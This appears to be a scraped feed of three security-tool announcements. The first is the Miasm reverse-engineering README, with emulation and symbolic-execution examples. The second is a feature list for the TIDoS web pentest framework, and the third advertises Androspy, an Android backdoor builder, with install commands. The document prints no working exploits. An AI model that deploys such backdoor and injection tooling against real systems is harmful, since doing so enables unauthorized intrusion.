Miasm is a free and open source (GPLv2) reverse engineering framework. Miasm aims to analyze / modify / generate binary programs. Here is a non exhaustive list of features:Opening / modifying / generating PE / ELF 32 / 64 LE / BE using ElfesteemAssembling / Disassembling X86 / ARM / MIPS / SH4 / MSP430Representing assembly semantic using intermediate languageEmulating using JIT (dynamic code analysis, unpacking, …)Expression simplification for automatic de-obfuscation…See the official blog for more examples and demos.Basic examplesAssembling / DisassemblingImport Miasm x86 architecture:>>> from miasm2.arch.x86.arch import mn_x86>>> from miasm2.core.locationdb import LocationDBGet a location db:>>> loc_db = LocationDB()Assemble a line:>>> l = mn_x86.fromstring(‘XOR ECX, ECX’, loc_db, 32)>>> print lXOR ECX, ECX>>> mn_x86.asm(l)[‘1\xc9’, ‘3\xc9’, ‘g1\xc9’, ‘g3\xc9’]Modify an operand:>>> l.args[0] = mn_x86.regs.EAX>>> print lXOR EAX, ECX>>> a = mn_x86.asm(l)>>> print a[‘1\xc8’, ‘3\xc1’, ‘g1\xc8’, ‘g3\xc1’]Disassemble the result:>>> print mn_x86.dis(a[0], 32)XOR EAX, ECXUsing Machine abstraction:>>> from miasm2.analysis.machine import Machine>>> mn = Machine(‘x86_32’).mn>>> print mn.dis(‘\x33\x30’, 32)XOR ESI, DWORD PTR [EAX]For Mips:>>> mn = Machine(‘mips32b’).mn>>> print mn.dis(’97A30020′.decode(‘hex’), “b")LHU V1, 0x20(SP)Intermediate representationCreate an instruction:>>> machine = Machine(‘arml’)>>> instr = machine.mn.dis(‘002088e0’.decode(‘hex’), ‘l’)>>> print instrADD R2, R8, R0Create an intermediate representation object:>>> ira = machine.ira(loc_db)Create an empty ircfg>>> ircfg = ira.new_ircfg()Add instruction to the pool:>>> ira.add_instr_to_ircfg(instr, ircfg)Print current pool:>>> for lbl, irblock in ircfg.blocks.items():… print irblock.to_string(loc_db)loc_0:R2 = R8 + R0IRDst = loc_4Working with IR, for instance by getting side effects:>>> for lbl, irblock in ircfg.blocks.iteritems():… for assignblk in irblock:… rw = assignblk.get_rw()… for dst, reads in rw.iteritems():… print ‘read: ‘, [str(x) for x in reads]… print ‘written:’, dst… print…read: [‘R8’, ‘R0’]written: R2read: []written: IRDstEmulationGiving a shellcode:00000000 8d4904 lea ecx, [ecx+0x4]00000003 8d5b01 lea ebx, [ebx+0x1]00000006 80f901 cmp cl, 0x100000009 7405 jz 0x100000000b 8d5bff lea ebx, [ebx-1]0000000e eb03 jmp 0x1300000010 8d5b01 lea ebx, [ebx+0x1]00000013 89d8 mov eax, ebx00000015 c3 ret>>> s = ‘\x8dI\x04\x8d[\x01\x80\xf9\x01t\x05\x8d[\xff\xeb\x03\x8d[\x01\x89\xd8\xc3’Import the shellcode thanks to the Container abstraction:>>> from miasm2.analysis.binary import Container>>> c = Container.from_string(s)>>> cDisassembling the shellcode at address 0:>>> from miasm2.analysis.machine import Machine>>> machine = Machine(‘x86_32′)>>> mdis = machine.dis_engine(c.bin_stream)>>> asmcfg = mdis.dis_multiblock(0)>>> for block in asmcfg.blocks:… print block.to_string(asmcfg.loc_db)…loc_0LEA ECX, DWORD PTR [ECX + 0x4]LEA EBX, DWORD PTR [EBX + 0x1]CMP CL, 0x1JZ loc_10-> c_next:loc_b c_to:loc_10loc_10LEA EBX, DWORD PTR [EBX + 0x1]-> c_next:loc_13loc_bLEA EBX, DWORD PTR [EBX + 0xFFFFFFFF]JMP loc_13-> c_to:loc_13loc_13MOV EAX, EBXRETInitializing the Jit engine with a stack:>>> jitter = machine.jitter(jit_type=’python’)>>> jitter.init_stack()Add the shellcode in an arbitrary memory location:>>> run_addr = 0x40000000>>> from miasm2.jitter.csts import PAGE_READ, PAGE_WRITE>>> jitter.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, s)Create a sentinelle to catch the return of the shellcode:def code_sentinelle(jitter): jitter.run = False jitter.pc = 0 return True>>> jitter.add_breakpoint(0x1337beef, code_sentinelle)>>> jitter.push_uint32_t(0x1337beef)Active logs:>>> jitter.set_trace_log()Run at arbitrary address:>>> jitter.init_run(run_addr)>>> jitter.continue_run()RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000000 RDX 0000000000000000RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000RIP 000000004000000040000000 LEA ECX, DWORD PTR [ECX+0x4]RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000….4000000e JMP loc_0000000040000013:0x40000013RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000RIP 000000004000001340000013 MOV EAX, EBXRAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000RIP 000000004000001340000015 RET>>>Interacting with the jitter:>>> jitter.vmad 1230000 size 10000 RW_ hpad 0x2854b40ad 40000000 size 16 RW_ hpad 0x25e0ed0>>> hex(jitter.cpu.EAX)’0x0L’>>> jitter.cpu.ESI = 12Symbolic executionInitializing the IR pool:>>> ira = machine.ira(loc_db)>>> ircfg = ira.new_ircfg_from_asmcfg(asmcfg)Initializing the engine with default symbolic values:>>> from miasm2.ir.symbexec import SymbolicExecutionEngine>>> sb = SymbolicExecutionEngine(ira)Launching the execution:>>> symbolic_pc = sb.run_at(ircfg, 0)>>> print symbolic_pc((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)Same, with step logs (only changes are displayed):>>> sb = SymbolicExecutionEngine(ira, machine.mn.regs.regs_init)>>> symbolic_pc = sb.run_at(ircfg, 0, step=True)Instr LEA ECX, DWORD PTR [ECX + 0x4]Assignblk:ECX = ECX + 0x4________________________________________________________________________________ECX = ECX + 0x4________________________________________________________________________________Instr LEA EBX, DWORD PTR [EBX + 0x1]Assignblk:EBX = EBX + 0x1________________________________________________________________________________EBX = EBX + 0x1ECX = ECX + 0x4________________________________________________________________________________Instr CMP CL, 0x1Assignblk:zf = (ECX[0:8] + -0x1)?(0x0,0x1)nf = (ECX[0:8] + -0x1)[7:8]pf = parity((ECX[0:8] + -0x1) & 0xFF)of = ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1))[7:8]cf = (((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1)) ^ ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1)))[7:8]af = ((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1))[4:5]________________________________________________________________________________af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]pf = parity((ECX + 0x4)[0:8] + 0xFF)zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)ECX = ECX + 0x4of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]EBX = EBX + 0x1________________________________________________________________________________Instr JZ loc_key_1Assignblk:IRDst = zf?(loc_key_1,loc_key_2)EIP = zf?(loc_key_1,loc_key_2)________________________________________________________________________________af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)pf = parity((ECX + 0x4)[0:8] + 0xFF)IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)ECX = ECX + 0x4of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]EBX = EBX + 0x1________________________________________________________________________________>>>Retry execution with a concrete ECX. Here, the symbolic / concolic execution reach the shellcode’s end:>>> from miasm2.expression.expression import ExprInt>>> sb.symbols[machine.mn.regs.ECX] = ExprInt(-3, 32)>>> symbolic_pc = sb.run_at(ircfg, 0, step=True)Instr LEA ECX, DWORD PTR [ECX + 0x4]Assignblk:ECX = ECX + 0x4________________________________________________________________________________af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)pf = parity((ECX + 0x4)[0:8] + 0xFF)IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)ECX = 0x1of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]EBX = EBX + 0x1________________________________________________________________________________Instr LEA EBX, DWORD PTR [EBX + 0x1]Assignblk:EBX = EBX + 0x1________________________________________________________________________________af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)pf = parity((ECX + 0x4)[0:8] + 0xFF)IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)ECX = 0x1of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]EBX = EBX + 0x2________________________________________________________________________________Instr CMP CL, 0x1Assignblk:zf = (ECX[0:8] + -0x1)?(0x0,0x1)nf = (ECX[0:8] + -0x1)[7:8]pf = parity((ECX[0:8] + -0x1) & 0xFF)of = ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1))[7:8]cf = (((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1)) ^ ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1)))[7:8]af = ((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1))[4:5]________________________________________________________________________________af = 0x0EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)pf = 0x1IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x2________________________________________________________________________________Instr JZ loc_key_1Assignblk:IRDst = zf?(loc_key_1,loc_key_2)EIP = zf?(loc_key_1,loc_key_2)________________________________________________________________________________af = 0x0EIP = 0x10pf = 0x1IRDst = 0x10zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x2________________________________________________________________________________Instr LEA EBX, DWORD PTR [EBX + 0x1]Assignblk:EBX = EBX + 0x1________________________________________________________________________________af = 0x0EIP = 0x10pf = 0x1IRDst = 0x10zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x3________________________________________________________________________________Instr LEA EBX, DWORD PTR [EBX + 0x1]Assignblk:IRDst = loc_key_3________________________________________________________________________________af = 0x0EIP = 0x10pf = 0x1IRDst = 0x13zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x3________________________________________________________________________________Instr MOV EAX, EBXAssignblk:EAX = EBX________________________________________________________________________________af = 0x0EIP = 0x10pf = 0x1IRDst = 0x13zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x3EAX = EBX + 0x3________________________________________________________________________________Instr RETAssignblk:IRDst = @32[ESP[0:32]]ESP = {ESP[0:32] + 0x4 0 32}EIP = @32[ESP[0:32]]________________________________________________________________________________af = 0x0EIP = @32[ESP]pf = 0x1IRDst = @32[ESP]zf = 0x1ECX = 0x1of = 0x0nf = 0x0cf = 0x0EBX = EBX + 0x3ESP = ESP + 0x4EAX = EBX + 0x3________________________________________________________________________________>>>How does it work?Miasm embeds its own disassembler, intermediate language and instruction semantic. It is written in Python.To emulate code, it uses LLVM, GCC, Clang or Python to JIT the intermediate representation. It can emulate shellcodes and all or parts of binaries. Python callbacks can be executed to interact with the execution, for instance to emulate library functions effects.DocumentationTODOAn auto-generated documentation is available here.Obtaining MiasmClone the repository: Miasm on GitHubGet one of the Docker images at Docker HubSoftware requirementsMiasm uses:python-pyparsingpython-develfesteem from Elfesteemoptionally python-pycparser (version >= 2.17)To enable code JIT, one of the following module is mandatory:GCCClangLLVM with Numba llvmlite, see below’optional’ Miasm can also use:Z3, the Theorem ProverConfigurationInstall elfesteemgit clone https://github.com/serpilliere/elfesteem.git elfesteemcd elfesteempython setup.py buildsudo python setup.py installTo use the jitter, GCC or LLVM is recommendedGCC (any version)Clang (any version)LLVMDebian (testing/unstable): Not testedDebian stable/Ubuntu/Kali/whatever: pip install llvmlite or install from llvmliteWindows: Not testedBuild and install Miasm:$ cd miasm_directory$ python setup.py build$ sudo python setup.py installIf something goes wrong during one of the jitter modules compilation, Miasm will skip the error and disable the corresponding module (see the compilation output).Windows & IDAMost of Miasm’s IDA plugins use a subset of Miasm functionnality. A quick way to have them working is to add:elfesteem directory and pyparsing.py to C:\…\IDA\python\ or pip install pyparsing elfesteemmiasm2/miasm2 directory to C:\…\IDA\python\All features excepting JITter related ones will be available. For a more complete installation, please refer to above paragraphs.TestingMiasm comes with a set of regression tests. To run all of them:cd miasm_directory/testpython test_all.pySome options can be specified:Mono threading: -mCode coverage instrumentation: -cOnly fast tests: -t long (excludes the long tests)They already use MiasmToolsSibyl: A function divination tooR2M2: Use miasm2 as a radare2 pluginCGrex : Targeted patcher for CGC binariesethRE Reversing tool for Ethereum EVM (with corresponding Miasm2 architecture)Blog posts / papers / conferencesDeobfuscation: recovering an OLLVM-protected programTaming a Wild Nanomite-protected MIPS Binary With Symbolic Execution: No Such CrackmeGénération rapide de DGA avec Miasm: Quick computation of DGA (French article)Enabling Client-Side Crash-Resistance to Overcome Diversification and Information Hiding: Detect undirected call potential argumentsMiasm: Framework de reverse engineering (French)Tutorial miasm (French video)Graphes de dépendances : Petit Poucet style: DepGraph (French)BooksPractical Reverse Engineering: X86, X64, Arm, Windows Kernel, Reversing Tools, and Obfuscation: Introduction to Miasm (Chapter 5 "Obfuscation")BlackHat Python – Appendix: Japan security book’s samplesMiscMan, does miasm has a link with rr0d?Yes! crappy code and uggly documentation.Download Miasm

Link: http://feedproxy.google.com/~r/PentestTools/~3/Cx6IGqWfrzI/miasm-reverse-engineering-framework-in.html

TIDoS-Framework v1.7 – The Offensive Manual Web Application Penetration Testing Framework

TIDoS Framework is a comprehensive web-app audit framework. let’s keep this simpleHighlights :-The main highlights of this framework is:TIDoS Framework now boasts of a century+ of modules.A complete versatile framework to cover up everything from Reconnaissance to Vulnerability Analysis.Has 5 main phases, subdivided into 14 sub-phases consisting a total of 104 modules.Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules).Scanning & Enumeration Phase has got 15 modules (including port scans, WAF analysis, etc)Vulnerability Analysis Phase has 36 modules (including most common vulnerabilites in action).Exploits Castle has only 1 exploit. (purely developmental)And finally, Auxillaries have got 4 modules. under dev.All four phases each have a Auto-Awesome module which automates every module for you.You just need the domain, and leave everything is to this tool.TIDoS has full verbose out support, so you’ll know whats going on.Fully user friendly interaction environment. (no shits)Installation :Clone the repository locally and navigate there:git clone https://github.com/theinfecteddrake/tidos-framework.gitcd tidos-frameworkInstall the dependencies:chmod +x install./installThats it! Now you are good to go! Now lets run the tool:tidosGetting Started :-TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API KEYS and ACCESS TOKENS for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own… no harm!Finally, as the framework opens up, enter the website name eg. http://www.example.com and let TIDoS lead you. Thats it! Its as easy as that.Recommended: Follow the order of the tool (Run in a schematic way). Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis To update this tool, use tidos_updater.py module under tools/ folder.Flawless Features :-TIDoS Framework presently supports the following: and is under active development Reconnaissance + OSINT Passive Reconnaissance: Nping Enumeration Via external APiWhoIS Lookup Domain info gatheringGeoIP Lookup Pinpoint physical locationDNS Configuration Lookup DNSDumpSubdomains Lookup Indexed onesReverse DNS Lookup Host InstancesReverse IP Lookup Hosts on same serverSubnets Enumeration Class BasedDomain IP History IP InstancesWeb Links Gatherer Indexed onesGoogle Search Manual searchGoogle Dorking (multiple modules) AutomatedEmail to Domain Resolver Email WhoIsWayback Machine Lookups Find BackupsBreached Email Check Pwned Email AccountsEnumeration via Google Groups Emails OnlyCheck Alias Availability Social NetworksFind PasteBin Posts Domain BasedLinkedIn Gathering Employees & CompanyGoogle Plus Gathering Domain ProfilesPublic Contact Info Scraping FULL CONTACTCensys Intel Gathering Domain BasedThreat Intelligence Gathering Bad IPsActive Reconnaissance Ping Enumeration AdvancedCMS Detection (185+ CMSs supported) IMPROVEDAdvanced Traceroute IMPROVEDrobots.txt and sitemap.xml CheckerGrab HTTP Headers Live CaptureFind HTTP Methods Allowed via OPTIONSDetect Server Type IMPROVEDExamine SSL Certificate AbsoluteApache Status Disclosure Checks File BasedWebDAV HTTP Enumeration PROFIND & SEARCHPHPInfo File Enumeration via BruteforceComments Scraper Regex BasedFind Shared DNS Hosts Name Server BasedAlternate Sites Discovery User-Agent BasedDiscover Interesting Files via Bruteforce Common Backdoor Locations shells, etc.Common Backup Locations .bak, .db, etc.Common Password Locations .pgp, .skr, etc.Common Proxy Path Configs. .pac, etc.Common Dot Files .htaccess, .apache, etcInformation Disclosure Credit Cards Disclosure If PlaintextEmail Harvester IMPROVEDFatal Errors Enumeration Includes Full Path DisclosureInternal IP Disclosure Signature BasedPhone Number Havester Signature BasedSocial Security Number Harvester US Ones Scanning & Enumeration Remote Server WAF Enumeration Generic 54 WAFsPort Scanning Ingenious Modules Simple Port Scanner via Socket ConnectionsTCP SYN Scan Highly reliableTCP Connect Scan Highly ReliableXMAS Flag Scan Reliable Only in LANsFin Flag Scan Reliable Only in LANsPort Service DetectorWeb Technology Enumeration AbsoluteOperating System Fingerprinting IMPROVEDBanner Grabbing of Services via Open PortsInteractive Scanning with NMap 16 preloaded modulesEnumeration Domain-Linked IPs Using CENSYS DatabaseWeb and Links CrawlersDepth 1 Indexed Uri CrawlerDepth 2 Single Page CrawlerDepth 3 Web Link Crawler Vulnerability Analysis Web-Bugs & Server Misconfigurations Insecure CORS AbsoluteSame-Site Scripting Sub-domain basedZone Transfer DNS Server basedClickjackingFrame-Busting ChecksX-FRAME-OPTIONS Header ChecksSecurity on CookiesHTTPOnly FlagSecure FlagCloudflare Misconfiguration CheckDNS Misconfiguration ChecksOnline Database Lookup For BreachesHTTP Strict Transport Security UsageHTTPS Enabled but no HSTSDomain Based Email SpoofingMissing SPF RecordsMissing DMARC RecordsHost Header InjectionPort Based Over HTTP 80X-Forwarded-For Header InjectionSecurity Headers Analysis Live CaptureCross-Site Tracing HTTP TRACE MethodSession Fixation via Cookie InjectionNetwork Security Misconfig.Checks for TELNET Enabled via Port 23Serious Web Vulnerabilities File InclusionsLocal File Inclusion (LFI) Param basedRemote File Inclusion (RFI) IMPROVED Parameter BasedPre-loaded Path BasedOS Command Injection Linux & Windows (RCE)Path Traversal (Sensitive Paths)Cross-Site Request Forgery AbsoluteSQL InjectionError Based InjectionCookie Value BasedReferer Value BasedUser-Agent Value BasedAuto-gathering IMPROVEDBlind Based Injection Crafted Payloads Cookie Value BasedReferer Value BasedUser-Agent Value BasedAuto-gathering IMPROVEDLDAP Injection Parameter BasedHTML Injection Parameter BasedBash Command Injection ShellShockXPATH Injection Parameter BasedCross-Site Scripting IMPROVED Cookie Value BasedReferer Value BasedUser-Agent Value BasedParameter Value Based ManualUnvalidated URL Forwards Open RedirectPHP Code Injection Windows + LinuxHTTP Response Splitting CRLF Injection User-Agent Value BasedParameter value Based ManualSub-domain Takeover 50+ Services Single Sub-domain ManualAll Subdomains AutomatedOther PlainText Protocol Default Credential Bruteforce FTP Protocol BruteforceSSH Protocol BruteforcePOP 2/3 Protocol BruteforceSQL Protocol BruteforceXMPP Protocol BruteforceSMTP Protocol BruteforceTELNET Protocol Bruteforce Auxillary Modules Hash Generator MD5, SHA1, SHA256, SHA512String & Payload Encoder 7 CategoriesForensic Image Analysis Metadata ExtractionWeb HoneyPot Probability ShodanLabs HoneyScore Exploitation purely developmental ShellShockOther Tools:net_info.py – Displays information about your network. Located under tools/.tidos_updater.py – Updates the framework to the latest release via signature matching. Located under `tools/’.TIDoS In Action:Version:v1.7 [latest release] [#stable]Upcoming:These are some modules which I have thought of adding:Some more of Enumeraton & Information Disclosure modules.Lots more of OSINT & Stuff (let that be a suspense).More of Auxillary Modules.Some Exploits are too being worked on.Ongoing:Working on a full-featured Web UI implementation on Flask and MongoDB and Node.js.Working on a new framework, a real framework. To be released with v2Working on a campaign feature + addition of arguments.Normal Bug Fixing Stuffs. As per the issues being raisedSome other perks:Working on a way for contributing new modules easily.A complete new method of multi-threaded fuzzing of parameters.Keeping better of new console stuff.Download TIDoS-Framework

Link: http://www.kitploit.com/2018/11/tidos-framework-v17-offensive-manual.html

Androspy – Backdoor Crypter & Creator With Automatic IP Poisener

Androspy : is Backdoor Crypter & Creator with Automatic IP Poisener Coded By Belahsan OuerghiDependencieskeytooljarsignerApache2Metasploit-FrameworkxtermInstallationsudo apt-get install gitgit clone https://github.com/TunisianEagles/Androspy.gitcd Androspychmod +x setup.shsudo ./setup.shchmod +x androspy.shsudo ./androspy.shTested on :BackBox LinuxKali linuxParrot osContactContact – Tunisian Eagles[Email] – tunisianeagles@protonmail.com – TunisianEaglesWebsite – TunisianEaglesDownload Androspy

Link: http://feedproxy.google.com/~r/PentestTools/~3/8EjIvxwgg_w/androspy-backdoor-crypter-creator-with.html